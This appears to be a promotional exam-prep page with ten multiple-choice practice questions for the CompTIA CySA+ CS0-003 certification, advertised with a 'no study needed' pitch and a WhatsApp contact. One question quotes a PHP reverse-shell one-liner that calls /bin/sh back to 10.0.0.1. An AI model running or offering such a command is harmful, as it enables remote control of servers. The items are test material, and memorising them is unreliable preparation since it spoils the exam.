Pass CompTIA CySA+ CS0-003 in Just 3 Days – Stress-Free, No Study Needed!
Have questions? Contact us directly on WhatsApp for quick support!
Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?
- A. Hacktivist threat
- B. Advanced persistent threat
- C. Unintentional insider threat
- D. Nation-state threat
A security analyst has received an incident case regarding malware spreading out of control on a customer’s network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware based on its telemetry?
- A. Cross-reference the signature with open-source threat intelligence.
- B. Configure the EDR to perform a full scan.
- C. Transfer the malware to a sandbox environment.
- D. Log in to the affected systems and run netstat.
A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?
- A. A local red team member is enumerating the local RFC1918 segment to enumerate hosts
- B. A threat actor has a foothold on the network and is sending out control beacons
- C. An administrator executed a new database replication process without notifying the SOC
- D. An insider threat actor is running Responder on the local segment, creating traffic replication
Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?
- A. Risk register
- B. Vulnerability assessment
- C. Penetration test
- D. Compliance report
Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
- A. Log retention
- B. Log rotation
- C. Maximum log size
- D. Threshold value
While reviewing web server logs, a security analyst discovers the following suspicious line:
php -r ’$socket=fsockopen(“10.0.0.1”, 1234); passthru (“/bin/sh -i <&3 >&3 2>&3”);’
Which of the following is being attempted?
- A. Remote file inclusion
- B. Command injection
- C. Server-side request forgery
- D. Reverse shell
Which of the following should be updated after a lessons-learned review?
- A. Disaster recovery plan
- B. Business continuity plan
- C. Tabletop exercise
- D. Incident response plan
A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?
- A. Perform static analyses using an integrated development environment
- B. Deploy compensating controls into the environment
- C. Implement server-side logging and automatic updates
- D. Conduct regular code reviews using OWASP best practices
An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst’s investigation?
- A. OpenVAS
- B. Angry IP Scanner
- C. Wireshark
- D. Maltego
Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization’s endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor’s actions?
- A. Delivery
- B. Reconnaissance
- C. Exploitation
- D. Weaponization